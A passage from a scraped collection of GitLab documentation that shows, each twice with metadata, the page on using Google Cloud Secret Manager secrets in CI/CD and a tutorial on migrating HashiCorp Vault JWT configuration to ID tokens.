deprecated](../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated). - You mismatched `provider_name` values between your `.gitlab-ci.yml` file and the OIDC Identity Provider configuration on the external service. - You missed or mismatched the `aud` (audience) claim between the ID token issued by GitLab and what the external service expects. - You did not enable or configure the `id_tokens:` block in the GitLab CI/CD job. To resolve the error, decode the token inside your job: ```shell echo $OIDC_TOKEN | cut -d '.' -f2 | base64 -d | jq . ``` Make sure that: - `aud` (audience) matches the expected audience (for example, the external service's URL). - `sub` (subject) is mapped in the service's Identity Provider settings. - `preferred_username` is not present by default in GitLab ID tokens.
https://docs.gitlab.com/ci/gcp_secret_manager
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/gcp_secret_manager.md
2025-08-13
doc/ci/secrets
[ "doc", "ci", "secrets" ]
gcp_secret_manager.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Use GCP Secret Manager secrets in GitLab CI/CD
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/11739) in GitLab and GitLab Runner 16.8. {{< /history >}} You can use secrets stored in the [Google Cloud (GCP) Secret Manager](https://cloud.google.com/security/products/secret-manager) in your GitLab CI/CD pipelines. The flow for using GitLab with GCP Secret Manager is: 1. GitLab issues an ID token to the CI/CD job. 1. The runner authenticates to GCP using the ID token. 1. GCP verifies the ID token with GitLab. 1. GCP issues a short-lived access token. 1. The runner accesses the secret data using the access token. 1. GCP checks IAM secret permission on the access token's principal. 1. GCP returns the secret data to the runner. To use GitLab with GCP Secret Manager, you must: - Have secrets stored in [GCP Secret Manager](https://cloud.google.com/security/products/secret-manager). - Configure [GCP Workload Identity Federation](#configure-gcp-iam-workload-identity-federation-wif) to include GitLab as an identity provider. - Configure [GCP IAM](#grant-access-to-gcp-iam-principal) permissions to grant access to GCP Secret Manager. - Configure [GitLab CI/CD with GCP Secret Manager](#configure-gitlab-cicd-to-use-gcp-secret-manager-secrets). ## Configure GCP IAM Workload Identity Federation (WIF) GCP IAM WIF must be configured to recognize ID tokens issued by GitLab and assign an appropriate principal to them. The principal is used to authorize access to the Secret Manager resources: 1. In GCP Console, go to **IAM & Admin > Workload Identity Federation**. 1. Select **CREATE POOL** and create a new identity pool with a unique name, for example `gitlab-pool`. 1. Select **ADD PROVIDER** to add a new OIDC Provider to the Identity Pool with a unique name, for example `gitlab-provider`. 1. Set **Issuer (URL)** to the GitLab URL, for example `https://gitlab.com`. 1. Select **Default audience**, or select **Allowed audiences** for a custom audience, which is used in the `aud` for the GitLab CI/CD ID token. 1. Under **Attribute Mapping**, create the following mappings, where: - `attribute.X` is the name of the attribute to include as a claim in the Google token. - `assertion.X` is the value to extract from the [GitLab claim](../cloud_services/_index.md#id-token-authentication-for-cloud-services). | Attribute (on Google) | Assertion (from GitLab) | |-------------------------------|-------------------------| | `google.subject` | `assertion.sub` | | `attribute.gitlab_project_id` | `assertion.project_id` | ## Grant access to GCP IAM principal After setting up WIF, you must grant the WIF principal access to the secrets in Secret Manager. 1. In GCP Console, go to **Security > Secret Manager**. 1. Select the name of the secret you wish to grant access to, to view the secret's details. 1. From the **PERMISSIONS** tab, select **GRANT ACCESS** to grant access to the principal set created through the WIF provider. The external identity format is: ```plaintext principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.gitlab_project_id/GITLAB_PROJECT_ID ``` In this example: - `PROJECT_NUMBER`: Your Google Cloud project number (not ID) which can be found in the [Project's dashboard](https://console.cloud.google.com/home/dashboard). - `POOL_ID`: The ID (not name) of the workload identity pool created in the first section, for example `gitlab-pool`. - `GITLAB_PROJECT_ID`: The GitLab project ID found on the [project overview page](../../user/project/working_with_projects.md#find-the-project-id). 1. Assign the role **Secret Manager Secret Accessor**. ## Configure GitLab CI/CD to use GCP Secret Manager secrets You must [add these CI/CD variables](../variables/_index.md#for-a-project) to provide details about your GCP Secret Manager: - `GCP_PROJECT_NUMBER`: The GCP [Project Number](https://cloud.google.com/resource-manager/docs/creating-managing-projects). - `GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID`: The WIF Pool ID, for example `gitlab-pool`. - `GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID`: The WIF Provider ID, for example `gitlab-provider`. Then you can use secrets stored in GCP Secret Manager in CI/CD jobs by defining them with the `gcp_secret_manager` keyword: ```yaml job_using_gcp_sm: id_tokens: GCP_ID_TOKEN: # `aud` must match the audience defined in the WIF Identity Pool. aud: https://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID}/providers/${GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID} secrets: DATABASE_PASSWORD: gcp_secret_manager: name: my-project-secret # This is the name of the secret defined in GCP Secret Manager version: 1 # optional: default to `latest`. token: $GCP_ID_TOKEN ``` ### Use secrets from a different GCP project {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/37487) in GitLab 17.0. {{< /history >}} Secret names in GCP are per-project. By default the secret named in `gcp_secret_manager:name` is read from the project specified in `GCP_PROJECT_NUMBER`. To read a secret from a different project than the project containing the WIF pool, use the fully-qualified secret name formatted as `projects/<project-number>/secrets/<secret-name>`. For example, if `my-project-secret` is in the GCP project number `123456789`, then you can access the secret with: ```yaml job_using_gcp_sm: # ... as previously configured ... secrets: DATABASE_PASSWORD: gcp_secret_manager: name: projects/123456789/secrets/my-project-secret # fully-qualified name of the secret defined in GCP Secret Manager version: 1 # optional: defaults to `latest`. token: $GCP_ID_TOKEN ``` ## Troubleshooting ### Error: The size of mapped attribute `google.subject` exceeds the 127 bytes limit Long branch paths can cause a job to fail with this error, because the [`assertion.sub` attribute](id_token_authentication.md#token-payload) becomes longer than 127 characters: ```plaintext ERROR: Job failed (system failure): resolving secrets: failed to exchange sts token: googleapi: got HTTP response code 400 with body: {"error":"invalid_request","error_description":"The size of mapped attribute google.subject exceeds the 127 bytes limit. Either modify your attribute mapping or the incoming assertion to produce a mapped attribute that is less than 127 bytes."} ``` Long branch paths can be caused by: - Deeply nested subgroups. - Long group, repository, or branch names. For example, for a `gitlab-org/gitlab` branch, the payload is `project_path:gitlab-org/gitlab:ref_type:branch:ref:{branch_name}`. For the string to remain shorter than 127 characters, the branch name must be 76 characters or fewer. This limit is imposed by Google Cloud IAM, tracked in [Google issue #264362370](https://issuetracker.google.com/issues/264362370?pli=1). The only fix for this issue is to use shorter names [for your branch and repository](https://github.com/google-github-actions/auth/blob/main/docs/TROUBLESHOOTING.md#subject-exceeds-the-127-byte-limit). ### `The secrets provider can not be found. Check your CI/CD variables and try again.` message You might receive this error when attempting to start a job configured to access GCP Secret Manager: ```plaintext The secrets provider can not be found. Check your CI/CD variables and try again. ``` The job can't be created because one or more of the required variables are not defined: - `GCP_PROJECT_NUMBER` - `GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID` - `GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID` ### `WARNING: Not resolved: no resolver that can handle the secret` warning The Google Cloud Secret Manager integration requires at least GitLab 16.8 and GitLab Runner 16.8. This warning appears if the job is executed by a runner using a version earlier than 16.8. On GitLab.com, there is a [known issue](https://gitlab.com/gitlab-org/ci-cd/shared-runners/infrastructure/-/issues/176) causing SaaS runners to run an older version. As a workaround until this issue is fixed, you can register your own GitLab Runner with version 16.8 or later.
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use GCP Secret Manager secrets in GitLab CI/CD breadcrumbs: - doc - ci - secrets --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/11739) in GitLab and GitLab Runner 16.8. {{< /history >}} You can use secrets stored in the [Google Cloud (GCP) Secret Manager](https://cloud.google.com/security/products/secret-manager) in your GitLab CI/CD pipelines. The flow for using GitLab with GCP Secret Manager is: 1. GitLab issues an ID token to the CI/CD job. 1. The runner authenticates to GCP using the ID token. 1. GCP verifies the ID token with GitLab. 1. GCP issues a short-lived access token. 1. The runner accesses the secret data using the access token. 1. GCP checks IAM secret permission on the access token's principal. 1. GCP returns the secret data to the runner. To use GitLab with GCP Secret Manager, you must: - Have secrets stored in [GCP Secret Manager](https://cloud.google.com/security/products/secret-manager). - Configure [GCP Workload Identity Federation](#configure-gcp-iam-workload-identity-federation-wif) to include GitLab as an identity provider. - Configure [GCP IAM](#grant-access-to-gcp-iam-principal) permissions to grant access to GCP Secret Manager. - Configure [GitLab CI/CD with GCP Secret Manager](#configure-gitlab-cicd-to-use-gcp-secret-manager-secrets). ## Configure GCP IAM Workload Identity Federation (WIF) GCP IAM WIF must be configured to recognize ID tokens issued by GitLab and assign an appropriate principal to them. The principal is used to authorize access to the Secret Manager resources: 1. In GCP Console, go to **IAM & Admin > Workload Identity Federation**. 1. Select **CREATE POOL** and create a new identity pool with a unique name, for example `gitlab-pool`. 1. Select **ADD PROVIDER** to add a new OIDC Provider to the Identity Pool with a unique name, for example `gitlab-provider`. 1. Set **Issuer (URL)** to the GitLab URL, for example `https://gitlab.com`. 1. Select **Default audience**, or select **Allowed audiences** for a custom audience, which is used in the `aud` for the GitLab CI/CD ID token. 1. Under **Attribute Mapping**, create the following mappings, where: - `attribute.X` is the name of the attribute to include as a claim in the Google token. - `assertion.X` is the value to extract from the [GitLab claim](../cloud_services/_index.md#id-token-authentication-for-cloud-services). | Attribute (on Google) | Assertion (from GitLab) | |-------------------------------|-------------------------| | `google.subject` | `assertion.sub` | | `attribute.gitlab_project_id` | `assertion.project_id` | ## Grant access to GCP IAM principal After setting up WIF, you must grant the WIF principal access to the secrets in Secret Manager. 1. In GCP Console, go to **Security > Secret Manager**. 1. Select the name of the secret you wish to grant access to, to view the secret's details. 1. From the **PERMISSIONS** tab, select **GRANT ACCESS** to grant access to the principal set created through the WIF provider. The external identity format is: ```plaintext principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.gitlab_project_id/GITLAB_PROJECT_ID ``` In this example: - `PROJECT_NUMBER`: Your Google Cloud project number (not ID) which can be found in the [Project's dashboard](https://console.cloud.google.com/home/dashboard). - `POOL_ID`: The ID (not name) of the workload identity pool created in the first section, for example `gitlab-pool`. - `GITLAB_PROJECT_ID`: The GitLab project ID found on the [project overview page](../../user/project/working_with_projects.md#find-the-project-id). 1. Assign the role **Secret Manager Secret Accessor**. ## Configure GitLab CI/CD to use GCP Secret Manager secrets You must [add these CI/CD variables](../variables/_index.md#for-a-project) to provide details about your GCP Secret Manager: - `GCP_PROJECT_NUMBER`: The GCP [Project Number](https://cloud.google.com/resource-manager/docs/creating-managing-projects). - `GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID`: The WIF Pool ID, for example `gitlab-pool`. - `GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID`: The WIF Provider ID, for example `gitlab-provider`. Then you can use secrets stored in GCP Secret Manager in CI/CD jobs by defining them with the `gcp_secret_manager` keyword: ```yaml job_using_gcp_sm: id_tokens: GCP_ID_TOKEN: # `aud` must match the audience defined in the WIF Identity Pool. aud: https://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID}/providers/${GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID} secrets: DATABASE_PASSWORD: gcp_secret_manager: name: my-project-secret # This is the name of the secret defined in GCP Secret Manager version: 1 # optional: default to `latest`. token: $GCP_ID_TOKEN ``` ### Use secrets from a different GCP project {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/37487) in GitLab 17.0. {{< /history >}} Secret names in GCP are per-project. By default the secret named in `gcp_secret_manager:name` is read from the project specified in `GCP_PROJECT_NUMBER`. To read a secret from a different project than the project containing the WIF pool, use the fully-qualified secret name formatted as `projects/<project-number>/secrets/<secret-name>`. For example, if `my-project-secret` is in the GCP project number `123456789`, then you can access the secret with: ```yaml job_using_gcp_sm: # ... as previously configured ... secrets: DATABASE_PASSWORD: gcp_secret_manager: name: projects/123456789/secrets/my-project-secret # fully-qualified name of the secret defined in GCP Secret Manager version: 1 # optional: defaults to `latest`. token: $GCP_ID_TOKEN ``` ## Troubleshooting ### Error: The size of mapped attribute `google.subject` exceeds the 127 bytes limit Long branch paths can cause a job to fail with this error, because the [`assertion.sub` attribute](id_token_authentication.md#token-payload) becomes longer than 127 characters: ```plaintext ERROR: Job failed (system failure): resolving secrets: failed to exchange sts token: googleapi: got HTTP response code 400 with body: {"error":"invalid_request","error_description":"The size of mapped attribute google.subject exceeds the 127 bytes limit. Either modify your attribute mapping or the incoming assertion to produce a mapped attribute that is less than 127 bytes."} ``` Long branch paths can be caused by: - Deeply nested subgroups. - Long group, repository, or branch names. For example, for a `gitlab-org/gitlab` branch, the payload is `project_path:gitlab-org/gitlab:ref_type:branch:ref:{branch_name}`. For the string to remain shorter than 127 characters, the branch name must be 76 characters or fewer. This limit is imposed by Google Cloud IAM, tracked in [Google issue #264362370](https://issuetracker.google.com/issues/264362370?pli=1). The only fix for this issue is to use shorter names [for your branch and repository](https://github.com/google-github-actions/auth/blob/main/docs/TROUBLESHOOTING.md#subject-exceeds-the-127-byte-limit). ### `The secrets provider can not be found. Check your CI/CD variables and try again.` message You might receive this error when attempting to start a job configured to access GCP Secret Manager: ```plaintext The secrets provider can not be found. Check your CI/CD variables and try again. ``` The job can't be created because one or more of the required variables are not defined: - `GCP_PROJECT_NUMBER` - `GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID` - `GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID` ### `WARNING: Not resolved: no resolver that can handle the secret` warning The Google Cloud Secret Manager integration requires at least GitLab 16.8 and GitLab Runner 16.8. This warning appears if the job is executed by a runner using a version earlier than 16.8. On GitLab.com, there is a [known issue](https://gitlab.com/gitlab-org/ci-cd/shared-runners/infrastructure/-/issues/176) causing SaaS runners to run an older version. As a workaround until this issue is fixed, you can register your own GitLab Runner with version 16.8 or later.
https://docs.gitlab.com/ci/convert-to-id-tokens
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/convert-to-id-tokens.md
2025-08-13
doc/ci/secrets
[ "doc", "ci", "secrets" ]
convert-to-id-tokens.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Tutorial: Update HashiCorp Vault configuration to use ID Tokens
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="note" >}} Starting in Vault 1.17, [JWT auth login requires bound audiences on the role](https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.17.x#jwt-auth-login-requires-bound-audiences-on-the-role) when the JWT contains an `aud` claim. The `aud` claim can be a single string or a list of strings. {{< /alert >}} This tutorial demonstrates how to convert your existing CI/CD secrets configuration to use [ID Tokens](id_token_authentication.md). The `CI_JOB_JWT` variables are deprecated, but updating to ID tokens requires some important configuration changes to work with Vault. If you have more than a handful of jobs, converting everything at once is a daunting task. There isn't one standard method to migrate to [ID tokens](id_token_authentication.md), so this tutorial includes two variations for how to convert your existing CI/CD secrets. Choose the method that is most appropriate for your use case: 1. Update your Vault configuration: - Method A: Migrate JWT roles to the new Vault auth method 1. [Create a second JWT authentication path in Vault](#create-a-second-jwt-authentication-path-in-vault) 1. [Recreate roles to use the new authentication path](#recreate-roles-to-use-the-new-authentication-path) - Method B: Move `iss` claim to roles for the migration window 1. [Add `bound_issuers` claim map to each role](#add-bound_issuers-claim-map-to-each-role) 1. [Remove `bound_issuers` claim from auth method](#remove-bound_issuers-claim-from-auth-method) 1. [Update your CI/CD Jobs](#update-your-cicd-jobs) ## Prerequisites This tutorial assumes you are familiar with GitLab CI/CD and Vault. To follow along, you must have: - An instance running GitLab 16.0 or later, or be on GitLab.com. - A Vault server that you are already using. - CI/CD jobs retrieving secrets from Vault with `CI_JOB_JWT`. In the following examples, replace: - `vault.example.com` with the URL of your Vault server. - `gitlab.example.com` with the URL of your GitLab instance. - `jwt` or `jwt_v2` with your auth method names. ## Method A: Migrate JWT roles to the new Vault auth method This method creates a second JWT auth method in parallel to the existing one in use. Afterwards all Vault roles used for the GitLab integration are recreated in this new auth method. ### Create a second JWT authentication path in Vault As part of the transition from `CI_JOB_JWT` to ID tokens, you must update the `bound_issuer` in Vault to include `https://`: ```shell $ vault write auth/jwt/config \ oidc_discovery_url="https://gitlab.example.com" \ bound_issuer="https://gitlab.example.com" ``` After you make this change, jobs that use `CI_JOB_JWT` start to fail. You can create multiple authentication paths in Vault, which enable you to transition to ID Tokens on a project by job basis without disruption. 1. Configure a new authentication path with the name `jwt_v2`, run: ```shell vault auth enable -path jwt_v2 jwt ``` You can choose a different name, but the rest of these examples assume you used `jwt_v2`, so update the examples as needed. 1. Configure the new authentication path for your instance: ```shell $ vault write auth/jwt_v2/config \ oidc_discovery_url="https://gitlab.example.com" \ bound_issuer="https://gitlab.example.com" ``` ### Recreate roles to use the new authentication path Roles are bound to a specific authentication path so you need to add new roles for each job. The `bound_audiences` parameter for the role is mandatory if the JWT contains an audience and must match at least one of the associated `aud` claims of the JWT. 1. Recreate the role for staging named `myproject-staging`: ```shell $ vault write auth/jwt_v2/role/myproject-staging - <<EOF { "role_type": "jwt", "policies": ["myproject-staging"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": ["https://vault.example.com"], "bound_claims": { "project_id": "22", "ref": "master", "ref_type": "branch" } } EOF ``` 1. Recreate the role for production named `myproject-production`: ```shell $ vault write auth/jwt_v2/role/myproject-production - <<EOF { "role_type": "jwt", "policies": ["myproject-production"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": ["https://vault.example.com"], "bound_claims_type": "glob", "bound_claims": { "project_id": "22", "ref_protected": "true", "ref_type": "branch", "ref": "auto-deploy-*" } } EOF ``` You only need to update `jwt` to `jwt_v2` in the `vault` command, do not change the `role_type` inside the role. ## Method B: Move `iss` claim to roles for migration window This method doesn't require Vault administrators to create a second JWT auth method and recreate all GitLab related roles. ### Add `bound_issuers` claim map to each role Vault doesn't allow multiple `iss` claims on the JWT auth method level, as the [`bound_issuer`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_issuer) directive on this level only accepts a single value. However, multiple claims can be configured on the role level by using the [`bound_claims`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims) map configuration directive. With this method you can provide Vault with multiple options for the `iss` claim validation. This supports the `https://` prefixed GitLab instance hostname claim that comes with the `id_tokens`, as well as the old non-prefixed claim. To add the [`bound_claims`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims) configuration to the required roles, run: ```shell $ vault write auth/jwt/role/myproject-staging - <<EOF { "role_type": "jwt", "policies": ["myproject-staging"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": ["https://vault.example.com"], "bound_claims": { "iss": [ "https://gitlab.example.com", "gitlab.example.com" ], "project_id": "22", "ref": "master", "ref_type": "branch" } } EOF ``` You do not need to alter any existing role configurations except for the `bound_claims` section. Make sure to add the `iss` configuration as shown previously, to ensure Vault accepts the prefixed and non-prefixed `iss` claim for this role. You must apply this change to all JWT roles used for the GitLab integration before moving on to the next step. You can revert the migration of the `iss` claim validation from the auth method to the roles if desired, after all projects have been migrated and you no longer need parallel support for `CI_JOB_JWT` and ID tokens. ### Remove `bound_issuers` claim from auth method After all roles have been updated with the `bound_claims.iss` claims, you can remove the auth method level configuration for this validation: ```shell $ vault write auth/jwt/config \ oidc_discovery_url="https://gitlab.example.com" \ bound_issuer="" ``` Setting the `bound_issuer` directive to an empty string removes the issuer validation on the auth method level. However, as we have moved this validation to the role level, this configuration is still secure. ## Update your CI/CD Jobs Vault has two different [KV Secrets Engines](https://developer.hashicorp.com/vault/docs/secrets/kv) and the version you are using impacts how you define secrets in CI/CD. Check the [Which Version is my Vault KV Mount?](https://support.hashicorp.com/hc/en-us/articles/4404288741139-Which-Version-is-my-Vault-KV-Mount) article on HashiCorp's support portal to check your Vault server. Also, if needed you can review the CI/CD documentation for: - [`secrets:`](../yaml/_index.md#secrets) - [`id_tokens:`](../yaml/_index.md#id_tokens) The following examples show how to obtain the staging database password written to the `password` field in `secret/myproject/staging/db`. The value for the `VAULT_AUTH_PATH` variable depends on the migration method you used: - Method A (Migrate JWT roles to the new Vault auth method): Use `jwt_v2`. - Method B (Move `iss` claim to roles for migration window): Use `jwt`. ### KV Secrets Engine v1 The [`secrets:vault`](../yaml/_index.md#secretsvault) keyword defaults to v2 of the KV Mount, so you need to explicitly configure the job to use the v1 engine: ```yaml job: variables: VAULT_SERVER_URL: https://vault.example.com VAULT_AUTH_PATH: jwt_v2 # or "jwt" if you used method B VAULT_AUTH_ROLE: myproject-staging id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: PASSWORD: vault: engine: name: kv-v1 path: secret field: password path: myproject/staging/db file: false ``` Both `VAULT_SERVER_URL` and `VAULT_AUTH_PATH` can be [defined as project or group CI/CD variables](../variables/_index.md#define-a-cicd-variable-in-the-ui), if preferred. We use [`secrets:file:false`](../yaml/_index.md#secretsfile) because ID tokens place secrets in a file by default, but we need it to work as a regular variable to match the old behavior. ### KV Secrets Engine v2 There are two formats you can use for the v2 engine. Long format: ```yaml job: variables: VAULT_SERVER_URL: https://vault.example.com VAULT_AUTH_PATH: jwt_v2 # or "jwt" if you used method B VAULT_AUTH_ROLE: myproject-staging id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: PASSWORD: vault: engine: name: kv-v2 path: secret field: password path: myproject/staging/db file: false ``` This is the same as the example for the v1 engine but `secrets:vault:engine:name:` is set to `kv-v2` to match the engine. You can also use a short format: ```yaml job: variables: VAULT_SERVER_URL: https://vault.example.com VAULT_AUTH_PATH: jwt_v2 # or "jwt" if you used method B VAULT_AUTH_ROLE: myproject-staging id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: PASSWORD: vault: myproject/staging/db/password@secret file: false ``` After you commit the updated CI/CD configuration, your jobs will be fetching secrets with ID Tokens, congratulations! If you have migrated all projects to fetch secrets with ID Tokens and used method B for the migration, it is now possible to move the `iss` claim validation back to the auth method configuration if you desire.
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: 'Tutorial: Update HashiCorp Vault configuration to use ID Tokens' breadcrumbs: - doc - ci - secrets --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="note" >}} Starting in Vault 1.17, [JWT auth login requires bound audiences on the role](https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.17.x#jwt-auth-login-requires-bound-audiences-on-the-role) when the JWT contains an `aud` claim. The `aud` claim can be a single string or a list of strings. {{< /alert >}} This tutorial demonstrates how to convert your existing CI/CD secrets configuration to use [ID Tokens](id_token_authentication.md). The `CI_JOB_JWT` variables are deprecated, but updating to ID tokens requires some important configuration changes to work with Vault. If you have more than a handful of jobs, converting everything at once is a daunting task. There isn't one standard method to migrate to [ID tokens](id_token_authentication.md), so this tutorial includes two variations for how to convert your existing CI/CD secrets. Choose the method that is most appropriate for your use case: 1. Update your Vault configuration: - Method A: Migrate JWT roles to the new Vault auth method 1. [Create a second JWT authentication path in Vault](#create-a-second-jwt-authentication-path-in-vault) 1. [Recreate roles to use the new authentication path](#recreate-roles-to-use-the-new-authentication-path) - Method B: Move `iss` claim to roles for the migration window 1. [Add `bound_issuers` claim map to each role](#add-bound_issuers-claim-map-to-each-role) 1. [Remove `bound_issuers` claim from auth method](#remove-bound_issuers-claim-from-auth-method) 1. [Update your CI/CD Jobs](#update-your-cicd-jobs) ## Prerequisites This tutorial assumes you are familiar with GitLab CI/CD and Vault. To follow along, you must have: - An instance running GitLab 16.0 or later, or be on GitLab.com. - A Vault server that you are already using. - CI/CD jobs retrieving secrets from Vault with `CI_JOB_JWT`. In the following examples, replace: - `vault.example.com` with the URL of your Vault server. - `gitlab.example.com` with the URL of your GitLab instance. - `jwt` or `jwt_v2` with your auth method names. ## Method A: Migrate JWT roles to the new Vault auth method This method creates a second JWT auth method in parallel to the existing one in use. Afterwards all Vault roles used for the GitLab integration are recreated in this new auth method. ### Create a second JWT authentication path in Vault As part of the transition from `CI_JOB_JWT` to ID tokens, you must update the `bound_issuer` in Vault to include `https://`: ```shell $ vault write auth/jwt/config \ oidc_discovery_url="https://gitlab.example.com" \ bound_issuer="https://gitlab.example.com" ``` After you make this change, jobs that use `CI_JOB_JWT` start to fail. You can create multiple authentication paths in Vault, which enable you to transition to ID Tokens on a project by job basis without disruption. 1. Configure a new authentication path with the name `jwt_v2`, run: ```shell vault auth enable -path jwt_v2 jwt ``` You can choose a different name, but the rest of these examples assume you used `jwt_v2`, so update the examples as needed. 1. Configure the new authentication path for your instance: ```shell $ vault write auth/jwt_v2/config \ oidc_discovery_url="https://gitlab.example.com" \ bound_issuer="https://gitlab.example.com" ``` ### Recreate roles to use the new authentication path Roles are bound to a specific authentication path so you need to add new roles for each job. The `bound_audiences` parameter for the role is mandatory if the JWT contains an audience and must match at least one of the associated `aud` claims of the JWT. 1. Recreate the role for staging named `myproject-staging`: ```shell $ vault write auth/jwt_v2/role/myproject-staging - <<EOF { "role_type": "jwt", "policies": ["myproject-staging"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": ["https://vault.example.com"], "bound_claims": { "project_id": "22", "ref": "master", "ref_type": "branch" } } EOF ``` 1. Recreate the role for production named `myproject-production`: ```shell $ vault write auth/jwt_v2/role/myproject-production - <<EOF { "role_type": "jwt", "policies": ["myproject-production"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": ["https://vault.example.com"], "bound_claims_type": "glob", "bound_claims": { "project_id": "22", "ref_protected": "true", "ref_type": "branch", "ref": "auto-deploy-*" } } EOF ``` You only need to update `jwt` to `jwt_v2` in the `vault` command, do not change the `role_type` inside the role. ## Method B: Move `iss` claim to roles for migration window This method doesn't require Vault administrators to create a second JWT auth method and recreate all GitLab related roles. ### Add `bound_issuers` claim map to each role Vault doesn't allow multiple `iss` claims on the JWT auth method level, as the [`bound_issuer`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_issuer) directive on this level only accepts a single value. However, multiple claims can be configured on the role level by using the [`bound_claims`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims) map configuration directive. With this method you can provide Vault with multiple options for the `iss` claim validation. This supports the `https://` prefixed GitLab instance hostname claim that comes with the `id_tokens`, as well as the old non-prefixed claim. To add the [`bound_claims`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims) configuration to the required roles, run: ```shell $ vault write auth/jwt/role/myproject-staging - <<EOF { "role_type": "jwt", "policies": ["myproject-staging"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": ["https://vault.example.com"], "bound_claims": { "iss": [ "https://gitlab.example.com", "gitlab.example.com" ], "project_id": "22", "ref": "master", "ref_type": "branch" } } EOF ``` You do not need to alter any existing role configurations except for the `bound_claims` section. Make sure to add the `iss` configuration as shown previously, to ensure Vault accepts the prefixed and non-prefixed `iss` claim for this role. You must apply this change to all JWT roles used for the GitLab integration before moving on to the next step. You can revert the migration of the `iss` claim validation from the auth method to the roles if desired, after all projects have been migrated and you no longer need parallel support for `CI_JOB_JWT` and ID tokens. ### Remove `bound_issuers` claim from auth method After all roles have been updated with the `bound_claims.iss` claims, you can remove the auth method level configuration for this validation: ```shell $ vault write auth/jwt/config \ oidc_discovery_url="https://gitlab.example.com" \ bound_issuer="" ``` Setting the `bound_issuer` directive to an empty string removes the issuer validation on the auth method level. However, as we have moved this validation to the role level, this configuration is still secure. ## Update your CI/CD Jobs Vault has two different [KV Secrets Engines](https://developer.hashicorp.com/vault/docs/secrets/kv) and the version you are using impacts how you define secrets in CI/CD. Check the [Which Version is my Vault KV Mount?](https://support.hashicorp.com/hc/en-us/articles/4404288741139-Which-Version-is-my-Vault-KV-Mount) article on HashiCorp's support portal to check your Vault server. Also, if needed you can review the CI/CD documentation for: - [`secrets:`](../yaml/_index.md#secrets) - [`id_tokens:`](../yaml/_index.md#id_tokens) The following examples show how to obtain the staging database password written to the `password` field in `secret/myproject/staging/db`. The value for the `VAULT_AUTH_PATH` variable depends on the migration method you used: - Method A (Migrate JWT roles to the new Vault auth method): Use `jwt_v2`. - Method B (Move `iss` claim to roles for migration window): Use `jwt`. ### KV Secrets Engine v1 The [`secrets:vault`](../yaml/_index.md#secretsvault) keyword defaults to v2 of the KV Mount, so you need to explicitly configure the job to use the v1 engine: ```yaml job: variables: VAULT_SERVER_URL: https://vault.example.com VAULT_AUTH_PATH: jwt_v2 # or "jwt" if you used method B VAULT_AUTH_ROLE: myproject-staging id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: PASSWORD: vault: engine: name: kv-v1 path: secret field: password path: myproject/staging/db file: false ``` Both `VAULT_SERVER_URL` and `VAULT_AUTH_PATH` can be [defined as project or group CI/CD 